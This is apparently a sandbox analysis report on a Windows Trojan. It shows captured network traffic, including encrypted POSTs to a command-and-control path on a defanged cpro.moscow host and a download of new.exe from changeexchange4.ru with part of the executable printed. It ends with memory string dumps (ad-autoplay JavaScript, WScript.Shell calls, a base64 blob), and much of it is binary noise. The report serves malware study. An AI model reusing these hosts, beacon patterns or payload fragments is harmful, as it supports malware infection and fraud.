......O@...c..........u.e.~...N-..h.:#....A.Bh.L..-W..7....r?%.ZHq.G..q.O.t6."G.M?.1.h......Ap?.1T ...B.H...e........A.q.3.W.......`....W..?..6.;.....p.U....$.....G....x.........4.......=a.-. D.G.PI..........Z..G..!...~#..G..,....enp..?..,.Z..2&h..h..{.......&K....z..QJ..n.O....._B......f.....E.l./.>N.8.N..#R'....?HjH......ll.M../n.X..........fF..........P.]:j..}..._..2.x...N0.h<.#o.3....9(..w..../.'.U..9..%...K.a....X...VD#......;.6;:..7...Y[.......3.c..F(.....Rc..`t.Gb%j.M....V..$S....o..f-...rA..k...^

<<< skipped >>>

POST /kent/exit.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.cpro.moscow

Content-Length: 277

Connection: Keep-Alive

Cache-Control: no-cache

.,.5...n

.aQ..M...n..Y.mR.Nlx..U...7....P..A..........v.....^.i.e6....;...L...@...6x.TQ....Js.O...A~...:z}4...."..!.$ic".s)....D[...f.......T%......c.v...9{......v.t.eB....b.Y%...G.dmt...6.8.7.....J..c....f!..R.R' .^p.........".5Y....gg.....`....r...6...~. ......{.@.L...j..

HTTP/1.1 200 OK

Server: nginx/1.2.1

Date: Sun, 20 Sep 2015 13:52:44 GMT

Content-Type: text/html

Content-Length: 76

Connection: keep-alive

X-Powered-By: PHP/5.4.27-1~dotdeb.1

Vary: Accept-Encoding

.).O/,.4@.-'`8..0....=.9.H.....=f.1..c..# .*..j.v6....P@.a. ..35.<.....('..VHTTP/1.1 200 OK..Server: nginx/1.2.1..Date: Sun, 20 Sep 2015 13:52:44 GMT..Content-Type: text/html..Content-Length: 76..Connection: keep-alive..X-Powered-By: PHP/5.4.27-1~dotdeb.1..Vary: Accept-Encoding...).O/,.4@.-'`8..0....=.9.H.....=f.1..c..# .*..j.v6....P@.a. ..35.<.....('..V....

POST /kent/exit.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.cpro.moscow

Content-Length: 277

Connection: Keep-Alive

Cache-Control: no-cache

e..Gp.O..rr..#.D)..v7.\.^l.?..H.d..3fS'...>k.n..R.MD...E....~....R.0..q..p

..k.\$6.......7?z].b~C......./ .n.^;'3.._.A<<.uu...!Xl0A..0..!N.?..:In.p..!V..K.m.x$.)c.l.f..px..(\.....;;sg.R|.....*9...`........

...A..7..0..6.7[.-~Vr.ie`y...>d.P...An...O... .........](t.7.7..}%X

HTTP/1.1 200 OK

Server: nginx/1.2.1

Date: Sun, 20 Sep 2015 13:52:45 GMT

Content-Type: text/html

Content-Length: 76

Connection: keep-alive

X-Powered-By: PHP/5.4.27-1~dotdeb.1

Vary: Accept-Encoding

.M.z.!.....{.#...Z.."3u..:....S..m.K....U....i.~G......(d...M)w5.Xe...;..h..HTTP/1.1 200 OK..Server: nginx/1.2.1..Date: Sun, 20 Sep 2015 13:52:45 GMT..Content-Type: text/html..Content-Length: 76..Connection: keep-alive..X-Powered-By: PHP/5.4.27-1~dotdeb.1..Vary: Accept-Encoding...M.z.!.....{.#...Z.."3u..:....S..m.K....U....i.~G......(d...M)w5.Xe...;..h....

GET / HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: microsoft.com

Cache-Control: no-cache

HTTP/1.1 301 Moved Permanently

Content-Type: text/html; charset=UTF-8

Location: hXXp://VVV.microsoft.com/

Server: Microsoft-IIS/8.5

P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"

X-Powered-By: ASP.NET

X-UA-Compatible: IE=EmulateIE7

Date: Sun, 20 Sep 2015 13:52:49 GMT

Connection: close

Content-Length: 148

<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://VVV.microsoft.com/">here</a></body>..

GET /new.exe HTTP/1.1

Accept: */*

Connection: Close

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: changeexchange4.ru

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Sun, 20 Sep 2015 13:52:44 GMT

Server: Apache/2.2.22 (Debian)

Last-Modified: Sun, 20 Sep 2015 12:45:08 GMT

ETag: "1c795b9-23fa8-5202d22803d00"

Accept-Ranges: bytes

Content-Length: 147368

Connection: close

Content-Type: application/x-msdos-program

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L...c..U.....................0......P.............@.................................Q.......................................D...(........................?..................................................(... ....................................text...H........................... ..`.data...............................@....rsrc...............................@..@l.[J............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

regsvr32.exe_3264:

.idata

.idata

.reloc

.reloc

P.rsrc

P.rsrc

Portions Copyright (c) 1983,99 Borland

Portions Copyright (c) 1983,99 Borland

kernel32.dll

kernel32.dll

Software\Microsoft\Windows NT\CurrentVersion

Software\Microsoft\Windows NT\CurrentVersion

wininet.dll

wininet.dll

user32.dll

user32.dll

ntdll.dll

ntdll.dll

Kernel32.dll

Kernel32.dll

URLMON.DLL

URLMON.DLL

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

PSAPI.dll

PSAPI.dll

HTTP/1.1

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {jwplayer().play()} catch(e){}

try {jwplayer().play()} catch(e){}

IWebBrowser

IWebBrowser

IWebBrowserApp4

IWebBrowserApp4

IWebBrowser2l

IWebBrowser2l

.length;

.length;

=String.fromCharCode(parseInt(

=String.fromCharCode(parseInt(

.substr(

.substr(

,2),16));

,2),16));

=String.fromCharCode(

=String.fromCharCode(

,1).charCodeAt()^

,1).charCodeAt()^

,1).charCodeAt());

,1).charCodeAt());

.length-1)?

.length-1)?

=new ActiveXObject("WScript.Shell");

=new ActiveXObject("WScript.Shell");

.Environment("Process"))("

.Environment("Process"))("

.Run("

.Run("

=new ActiveXObject("WScript.Shell");

=new ActiveXObject("WScript.Shell");

.RegRead("

.RegRead("

psapi.dll

psapi.dll

HTTP/1.1

HTTP/1.1

\\.\LCD

\\.\LCD

1234567890

1234567890

Shell32.dll

Shell32.dll

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

0123456789

0123456789

Mozilla

Mozilla

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

.text

.text

`.rdata

`.rdata

@.pdata

@.pdata

KERNEL32.dll

KERNEL32.dll

@.reloc

@.reloc

222.dll

222.dll

GetKeyboardType

GetKeyboardType

advapi32.dll

advapi32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

oleaut32.dll

oleaut32.dll

RegOpenKeyExW

RegOpenKeyExW

RegDeleteKeyW

RegDeleteKeyW

RegCreateKeyW

RegCreateKeyW

RegCreateKeyA

RegCreateKeyA

version.dll

version.dll

SetProcessWindowStation

SetProcessWindowStation

OpenWindowStationA

OpenWindowStationA

EnumChildWindows

EnumChildWindows

HttpSendRequestA

HttpSendRequestA

HttpOpenRequestA

HttpOpenRequestA

FindNextUrlCacheEntryA

FindNextUrlCacheEntryA

FindFirstUrlCacheEntryA

FindFirstUrlCacheEntryA

FindCloseUrlCache

FindCloseUrlCache

DeleteUrlCacheEntry

DeleteUrlCacheEntry

ole32.dll

ole32.dll

wsock32.dll

wsock32.dll

winmm.dll

winmm.dll

atl.dll

atl.dll

wtsapi32.dll

wtsapi32.dll

Wtsapi32.dll

Wtsapi32.dll

PSAPI.DLL

PSAPI.DLL

shell32.dll

shell32.dll

ShellExecuteExW

ShellExecuteExW

NtQueryValueKey

NtQueryValueKey

NtDeleteValueKey

NtDeleteValueKey

NtSetValueKey

NtSetValueKey

urlmon.dll

urlmon.dll

UrlMkSetSessionOption

UrlMkSetSessionOption

4"4,414?4

4"4,414?4

3,313[3`3

3,313[3`3

829

829

=.=3=[=`=

=.=3=[=`=

>!>&>7>

>!>&>7>

7)707;7@7

7)707;7@7

= =$=,=_=

= =$=,=_=

?0'101>1

?0'101>1

: :&: :}:

: :&: :}:

?,?;?@?^?

?,?;?@?^?

8 8$8(8,808

8 8$8(8,808

c2h3PgXWqt2QzTRrb/AnQFC6SRUgWch7j77TVxtWrXEisi5gWjLIKgQWWPjhp0UgEz/kVUGNipnIPLZxi8BxUOwd9J5DQbsosxVqooPcMxy2MFTKpmT8aROKg4jgPL5ULF6ilWRorquC8m0XR dR8hd6QeMVN1z8qMkD1vqxgm4LrkB3rrUobN/saPP2hYsk6VQTT5huKnOMVL5caR5vadBp7OdRzhgDnQIi0zuYfIv v02VfY9J3rrQjqC1 pFYIFt3Gp4UAQmbDJLGUi8hvJ5jIHnHXh6ZdE G2FTkJ3CI2Lj2wf8fOmqGCNuCUBH6Ec7vvAylDcuOVeqr6H9 GqsS1IfkCCllztP/uhBjWjey5V SSDAqDhRCVH uTCvACRGgad bO9wKfoRWb20kkPK8CJRO3Cb3ZBKGOeh51oRkebuOLldMrwBX33FmSkln88u4JdiIX3EOwtJpJ8fNuFb9sVJKqbY0xHN8Kq1Or8RhXvuFhn9jvExwsg77Nm9pukUDgOKXK2YjwzI43i2jlgqjXRjPGNPPw8yrBpOYbuqtlz4xPvXSChtWkqlonwCNmHPfYIqUJsozXDoUSntJjEjPKcnSYnNd4VI/OTKRZl4s3QZK4AiriXs m2G8zO3JfYHA4Mzloj7x/ZrAhvhzeMKq4FLKRhJG4T2JXyLgwvQjwXdohUQg4iEYHpcny L36V4uUkFcvU1tvpqDtiOQYa70HHcPEJfYLV8Toym38KdYL9IJPqUdop utIX7HhaldlXLQIAz7PWZnlHKctlhe5qmCRh7GYrijRosE0KLIyPrqsKKjC7bEFYXy01KABfO qe1pH4Q6vjT2LIWDeAU0QF7cNTSc9IrXxuiKrH9fzzDBmL0r2uP90MTpzx4Q6QXF6LFGMM4bSQRJvDy82dHpceQb5 wSJiwXfI1q0lw2j7yeKKU4d1S2yu1KSDqXTy9EIbNA OTz83nYnlm92yC4Q C1WaY TFWNwLLReTWs1XYS 5ycpe2nbJMnH2nWskkuEycGRyOKeWv9mBEriqVlrPdTjCXGsosq0/ze tTOFwuJz2YC0fKpts4kJR9uU15hpCl3Ic9igp1oMS77Hpr/6MeMHu7DkBY7jRBBOMa8af3kOwdC7KHIoA3ugO6idmr2mNlnOIPZ02aJF4A7BUmGxq6fAc/d4nsDOKJhYVDSSQ7jFKn0BxkkeEXGn1jlhM30sWUYRiITZB4hz3dELYpaKpOauqQgZJXLMoJUZjswMZcIHw8 hQQZBbCiXHRvYT0LMALC4KzcYhBVimTnaCzF92A/IwjwmuMcLdSrwxeDl hgJ64QRn4shSxTV72EJEeStKbUWop6I3XrGwDJziks02zJZ8Ngv5XQj8/6DVvQGXFx4TWNeBjq bLTDVLKQUg0huyqGeRETme3vgtHptbc3HtKLcy0vfPN7ho3GliJnfIlnwhAqPHR5IA154JiYW0oM7LzXCvf1CKxpj1LiIrZnwB6d7Jtt3Q8QKx 0eOeMKVM0ssWxpfLZL071LCj9dr01FLINneXWUENh HrZMrHiIwMc1UdC1vKZBx pQDZ646bysxGLoBQGMRzGdjCDwvbbfEXBUrd/g9Fb8hisLCdrpwEdRSFKUJPqH3u0UM6aNat6SOaQC2KyCuj XpXuVQl42OBunYjp28FYnjJ69lTqmpbMzQlwbndruPKMFUzTs7exQHCtDnZmeknvkCEDf6KSkltgHq1kAC84KUjHejJtsRDuBx0 zeOZ7k1xdwTTZ6D09GDNmaScqIuJBvxivLT94S5LKC6lFbmV89F32bLDuyMgdZst/wMPHcFbzg05tfs7uTHFvQFFuOLpHnHSgPnuNioE97QtBFTp6b9JZbfpd2gx jCYIjC6 c jSeFFiVxYZXbEZZZwc/YdSdKleWp1mhPeQm3JVaKaTXHwATQyKbAA5StQDJ1vp7z0ktMKi6ccOlyToNIZKAtx2K5VhhYNCQuk3aOczite07juFnr4cqEWU3ExokG73gHNySThVIb7F4aSuWLuvjJBJIPKF40P9iC768a11KJFrEnBjefcP2wz/YSZVEB4nyEQ06n3xYDzUt/F2cZ5JjhDq88rEvlE24 rRGht8HZgCa5XNtR51BNuBt3pp2eW78aCwiOEI8VDbn7AruVqkZrQQyYiz6MehXkTK77WrmjXVq5vzgUt4Jzu0pRfZGETR3S5xfz5uV2giiqXE6lYyjuBM0jm2JNf nUn iN35Go8p0Li5fuLrpjddQ1dFuKdDNclSXqPKGbcZU125ad0veW6dcXfvAw/P9kMO8/TKTtnfOw8XBDk2xHFOeyXOK/91hTRYgWLfAdC40pzwnNwRaWu2Aaw/vVSJQ/gFTtm5GDHCSIcKgmANglVtydNm8YkauqtmguErNundREO/6Xo5XpIF3kajshYV/7KjUgwJi9iqoftmRJ94/Tnr70imCuitzO5r81yZ3k1z4U 9Me8weKT69PB2aJTIMhrak6AV 2frGulcO1ju8IPk7W8QOYSGWq cymI4z/Bz5J1hFhMdrMzlFpBMzPF5zagQCDIFZV1HxA/RIEJeOKSZ4Sh1I 9/BXsFpOpr2zx DNvJXmpvgC81f5ca1ECBLO/o23asth4rsaKfBTvd5V ATraypf 5cH1w0H28a4Eb/Ho1gl2smdg5cfdBCyocaFQDyIhrgvO7l5RCcuG3sdDcbJzIvOHqtH8pP0vLIc1VLyyMD3b7vBzGSOxGaKGHNKEu/tR524QME0URfvXsGZU8fGNDZ3DE10bOQXQowrs34DwRQV3hyjTDDars/0rORfN73HxM NtO/9LTyB1neFGw7bd2xFjJ2 3mCbtmCg8m3ZfOK05dJ4zWtSUplLfpExGp NvDcwcq6kkSmvNjPrOG3lzUOkNU5LFwX fTSCdGTCfQ N7KO1iQp/ daGpiDbXS 1MYRI956xhzL6PchxIYyRYVOWPUSHrfgnlyaWcxAMhaj03mV4zdJncZwfgv/Dp1uMJAS0hikYb4RZOGHA7dU9G9T9SKw3OKguTYyrTdA55njE7WjvmI4MENhf2qDHPZ9g1qUSFArRTPUCG7yzx1NnKVcWcY7HkEV0j 9CGlVGrJ1 MiBpVEqzDY0vUeOH275PySs/rqsXNDJpLbNDmE0lbRtaNaOy3a3Tqdhx7Jx0Z84NQ9dllnjga9w XIiFWm5OwD P3yTbjqWPOTitm6HJkdvvvlBcOQSs8xyA9/Dvi/Uq0 rvcAOzBFRMoXpegqOp4ABA3rVGt6ooxDsMypVtyWhxdVWhkVraQr uMTeCoYUzwKWcOAP1AemeqcpTP6gxooeAaaTiEWs1Zs6 iB9 lIvynIWBmiCIJPTRXStMLo0r/dEUj4CiHg45RQB2syBda9JjdY0XGYeCNCLbz1JIZ27UeD6bi2aM/5n3a9MMny52SDEyjfO7Fm/sgwJu9KyKQtZOsuBOAU3iF4mpGB7NSG9y4I1fUVKO/QPr/Ri5wmz Zni3fuAEWTwd03qfK8ywZK0b5lagpTXuDab20 x86fQueLed2rRyaNQHQ4A/K7LlV/wNztP1gOQWKd/XqmkNNTUA3YqcXgA7 fFh0DdaKIz3ux5YYm6WpoR IjvZI0DudKoBDT5vbcg7awPBaPHmiwNi7krMp/wRhFAQ51N3v214gjeaW1j6bMR3lA9SoI3D7f1UnUxeMVlpAi9NPSkr/bs3ww4vgTkH3mWPh6JMWUXZ9/JW9DUb44EbqU sZnH33VZYhTRXvzPbeM33RlQ5PN4a5junE3q9tDwTu/7TzGARQvjLcA OST6QkmSObIMuhwG29jbvnhbVkBoBF87U3y9At2usdlnDTqn4XpLgEzr7y2hW28IwB1IMTp9Lc6bs/CzxMTIhGomY3XuLHQwzR1JP47OS7oEmIqKqem/ZsWC1L6lxU8Ij7UPvlreS4ivFjOEkMFyOaba3a8HZ73Sz64k5kbCOaBgeIe73I3WYHege7t2AgsSmDfb mNbiqCpwT 8n/rYk/wFRgOhtF96FVrvKvvPQztLJTcWvQXDm8uncg auwcf KcNWpM5EsstUrJCnazVk28hDtvnVNw73zsmW6HORlfumWpVIqHmVaZ3GKzvu2/WkM9D76zHfFGxzSTmu/QY3v1nk3Z38ky 4FH5uyR0svcFUUmMICwF5 PubCdBq1XivsKGdcDKqwIagfL65CWPpHVBYhoPyPi/s1qIx5KPp/huaJWUkExnCC33e3S0XEoYM0ZtV6U08/fgJph0RqHyYg02Xf6Y3oM t5bEe2pKglGlExbApVTV6ZLKYKGPfbJuZQbAXCC5y8kZBk8efHtSk1OJqVXdBdu3xPesAqf5c8O5VK3gsoeZaEF0FCxBKj tz9vYZC02eQe6 suEpXVRAPmlwFByKUJyGIItA9 1hCBMuyNl sEz8p2qAH4aRiN3EeO3FcpPLwI3V4H6WVQOH2cR QoDJqfl1MzjOtbYnwZ2z2o j3EoDrkuN/dNQdwGlWXgYp2Ka4Dokjf N0l9jtdDeqcVIT7UnPxNobPutRirxsSJ2ykiPosbCuSmGJ2luJnNB2f544LQeD6Ywu5gBT7NC0CmN0zdiF//uq1mIzekizAnyOUYWpRppij5I9dhei3EuFxJKPvu9NohC121dVsh5GLiNcJ2rv2cLEjUiCN0mWy5nFaDe9yEG6Q4LUEw3h3spbcwkKgq3InOIXH5xyQL9R8ycznUoXgaMzAr/ISItqIw9JINdKxGL1 qjfEem6MYgVVsr/8choKvCW3007EyRqptoTDlADiu91orLcl0PbNb7BwNmfZYMYrAImr/ByyAPFLZO87xv/oBB pPVyNCJs p1FNOzmfv5NFa1bvC4f37nMbd9Udx/OikdZavj1wdDGzMX6oViwK VhwR r12DcYln6G6K0FiXQ7tHi5yP9RVPmiN76S1Vy2nlwA iOB3Pn9dU98LHhqob7bNx2VH7r 236DG4JEQj2rNOyrvDHeBZILrP8gpgQsyXAK/vkBtS6zefT5U985ibWtURWUNfHZ7CKJTgnao30Yvix7ONG9X55dsRcEJsMjn79ri1ggH4W1QbM5WFZMBPGSQDmCo6BJVEA0zw/H8OzA94G/meiuKtFGBET2kEJBXkiJ/Nj45RwF7GioMHDh2nVKeM9RtLi6QkyJY2F5p6JgfdOCy7Vb0zpCLzR/gTcI/SBE9fJEe2RdzbBEkIiIq/e5XXzdy5VE264JbYDhVUzkYqT5m5RvpQ1WaoYNLOogRS9kKjsthNMNbpWOOQIkjLaVTReY/CY S7dhLpEDz0n8gwdM2U/R8nu lECUYqEY2N5p3IRtfbkQ9BtlwlQBIFOblFccd1kks7s/p1tH9FyODzisTiaABwyIHBYjwJzod99fLPtGtDZ7wcJ 1TEaSyCWhxPcVqtsARsxgh8oGIM6Xyf9znVVg1pA4Ls5zfs/DfcZ7hLlvE6nzJh22z/9mdImznshhlPfIfcQ2rF97V9mikNxuGTNrfqHPJZPeBpwxJV5C918ybmhlPrOMKMJJmJKxJaM1i lyVp78eTRLF72u3n y3dEq5vOTbnCXE4gE61szPbjUc0NMmtPxnVrhoOajBwJyk7ozqJbZgxLPzF1gH0DvcrYPeUs/uFzXDlXwa/qB6C08bQDsH50J6UqQV67oX8HY4h28v49y7cUWUYt3Mcy8NznHD4clKGtsQJPldyCkekfi/tch9lmECxVI197U/93trIQrhvZKJtY c/pZlRliwqVhofXEh6c GUXPX1LEmI6YdIyElqCybGJFGlXYOTqNm3O4kuiUxZqPSmKBJ6QWuFIaJzSyZl Jg6uvi9mooC6CdqR Sx/PpLqV5cD7gnw66FcLDxTKXnvGFig9K/EVh cmYE/SWPl4i C2WAtSKZol6vKAbpi0JDfpAwb9eAx60GySErBYDPFQ9hV3OljxOyq9UBEM7OJk5Aot0tIA1CGT/TCL/Vw1eo6OBnKsvR2JwX5jtOhDXdZhbnLwIkjd8RNGb5Or93MOW7B2hKPfdUco6zV0CD GBCjois1LL6loZ33mdpD8QLjmSEjX0/DL iWQ9IThcbkpRV Z7qGXywNr4r4/WCNuOhUdugAlxgkLBloP2ipBDB7QYyEtUGgH0RAmE9n9dAqB6knCSFBq3L6G2EEv4CWMS6DrR8HgXt1rr10mz9JtQ2PQarG7zMxWyQG21w9uyT7EVBX0nir8Em95NT7X8HStIfGYMPIJ7xRUHkdxTx1pjFxzQWOVJcvKa5w5gpA1Xov1wrHpdWD8VCTFAkBfv6EfxUVSGGb OLa MIsuuFY/WMhOOjwsujPMZPJFSW2Y7j2SkgtkTZ1FeXEraT6BPM7U zzi5szN0vXyzFMvIo5Uu3QUtJltqCVCohBgY7/cZ4po1gxL/va0HsYcxv6YwPJJq231t4rXLJ4hEOJTz6mvJMMrKz YdO2V/8UuI/pTD9KAcgsxdDp3oZfJbpfx6IsM7eT4F4LNHw695TSM/EgyiIV581yI4nPHNJfxYJ3aXrKI/3oIfmjG5gTZoe2McS7IyDT73KBBL wXfPBKnSRgaxj K0wDIqHpjJaK27UUZG3flQM8RX4q6hgjJQAqMhZIVJC0Z 7Dqg W9gui9 BPwTi Bqco9TXX1ju293YfVWajIe0 8BnvnmJTS7gXqFAa1mfLcZdM5cNsSj9nMiIS2FHcOHeeP2JHy5f6msa9r8wDpSmetJ1Guhf/C2rJjqA1EiQOJR4KXy2JsQtn7ahmRbDcY G6YukhUP0gjCjRqtEU8rs2S4RcsoHfAdO3UQGzwcST73Hohg6n6bH5Cu4obOlXvg0rdvbOw c6cCdEDHeWh0CwfWaSI/SslwL70DERLEDhjXDKdOxSgGBeryK0W75m2KDjcseqV9wxpZADM2II2XjrMCEMtQk29iUS9b7S2FBU0ncF3XHjttNqI5R2UimjOo57C2ESUqn3wK/uP490uI0 7Knr4OD5qc95H8/8eJz7CuIEx882f9Yd6goaCtChnBv8rzwUeH86vGTG4bmRKOX5H9ztPQHDO3hox1rmLXrgZTotKRmtyAS7MrB0pjZdQxu3vRyEsyLDy2YBQv5/y6ZSlRTI6oOhJO2C4c0pkOfdLrvRwAm2nHagci47ExA5k0xvoqK8mXydCQkOZGRJHon9SYqoVthUvfRwAxWXA6zllWTNb 8W8aXHc8YGcqpAQxuzLvTQZwW8C3/N DKFK3YyXVo54wu/Oo/LtmaZ0OVNKovH4LoOJSyLuqOmF4da2wdbd77pp2r5XYBc ri7Zsv6i makju6nos7WqQ/Fo9hG2tQGHoHz6srqQ7B0L3IKlvePezzzcwvn6qQE4Z5 yiNA wRJjVJSrGVBploFCMCA7VJYsAOUIr3FkxwmWYd K7d4f8ara5D20P2vzQoSY//YOLNyQWbRdcmie/jm8 tkLoO9qkJ Si4Q/rhOb229XRmnZmkv87KPDRLK5P5Kdl 1Gh0f7yRCGMQWlAnzmIzSWl6ufjKsy4OHw Ibg4fapFDoByZKKUxMyFFp1o2SuA/H6O5bu0GRvqoVpCNbSMRqVB7cRO8wM0/emO7ftHvENtuW9oujk85 Jjhu0zrH6iEIVxZm9cojZMHUd2B WJfdOdPhNO710 x2l8hXOaqLDguLjZsgHlYR0M6IxlfJvivhj5MHOTRT1y4uxyTTlYgZFGyMXDgAKB2jXI3Cty0vZUTp5Q9PNpbLSoZGc/zw4/TpKWXyzfAHlkkibwotw2OYzUOgtbggg4jpmlBoT2JOao1ctkr2d3UBmAy8XpvspvnBX/xvpdRL/1QMys=lRCPASX27nuqqN0rPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD

c2h3PgXWqt2QzTRrb/AnQFC6SRUgWch7j77TVxtWrXEisi5gWjLIKgQWWPjhp0UgEz/kVUGNipnIPLZxi8BxUOwd9J5DQbsosxVqooPcMxy2MFTKpmT8aROKg4jgPL5ULF6ilWRorquC8m0XR dR8hd6QeMVN1z8qMkD1vqxgm4LrkB3rrUobN/saPP2hYsk6VQTT5huKnOMVL5caR5vadBp7OdRzhgDnQIi0zuYfIv v02VfY9J3rrQjqC1 pFYIFt3Gp4UAQmbDJLGUi8hvJ5jIHnHXh6ZdE G2FTkJ3CI2Lj2wf8fOmqGCNuCUBH6Ec7vvAylDcuOVeqr6H9 GqsS1IfkCCllztP/uhBjWjey5V SSDAqDhRCVH uTCvACRGgad bO9wKfoRWb20kkPK8CJRO3Cb3ZBKGOeh51oRkebuOLldMrwBX33FmSkln88u4JdiIX3EOwtJpJ8fNuFb9sVJKqbY0xHN8Kq1Or8RhXvuFhn9jvExwsg77Nm9pukUDgOKXK2YjwzI43i2jlgqjXRjPGNPPw8yrBpOYbuqtlz4xPvXSChtWkqlonwCNmHPfYIqUJsozXDoUSntJjEjPKcnSYnNd4VI/OTKRZl4s3QZK4AiriXs m2G8zO3JfYHA4Mzloj7x/ZrAhvhzeMKq4FLKRhJG4T2JXyLgwvQjwXdohUQg4iEYHpcny L36V4uUkFcvU1tvpqDtiOQYa70HHcPEJfYLV8Toym38KdYL9IJPqUdop utIX7HhaldlXLQIAz7PWZnlHKctlhe5qmCRh7GYrijRosE0KLIyPrqsKKjC7bEFYXy01KABfO qe1pH4Q6vjT2LIWDeAU0QF7cNTSc9IrXxuiKrH9fzzDBmL0r2uP90MTpzx4Q6QXF6LFGMM4bSQRJvDy82dHpceQb5 wSJiwXfI1q0lw2j7yeKKU4d1S2yu1KSDqXTy9EIbNA OTz83nYnlm92yC4Q C1WaY TFWNwLLReTWs1XYS 5ycpe2nbJMnH2nWskkuEycGRyOKeWv9mBEriqVlrPdTjCXGsosq0/ze tTOFwuJz2YC0fKpts4kJR9uU15hpCl3Ic9igp1oMS77Hpr/6MeMHu7DkBY7jRBBOMa8af3kOwdC7KHIoA3ugO6idmr2mNlnOIPZ02aJF4A7BUmGxq6fAc/d4nsDOKJhYVDSSQ7jFKn0BxkkeEXGn1jlhM30sWUYRiITZB4hz3dELYpaKpOauqQgZJXLMoJUZjswMZcIHw8 hQQZBbCiXHRvYT0LMALC4KzcYhBVimTnaCzF92A/IwjwmuMcLdSrwxeDl hgJ64QRn4shSxTV72EJEeStKbUWop6I3XrGwDJziks02zJZ8Ngv5XQj8/6DVvQGXFx4TWNeBjq 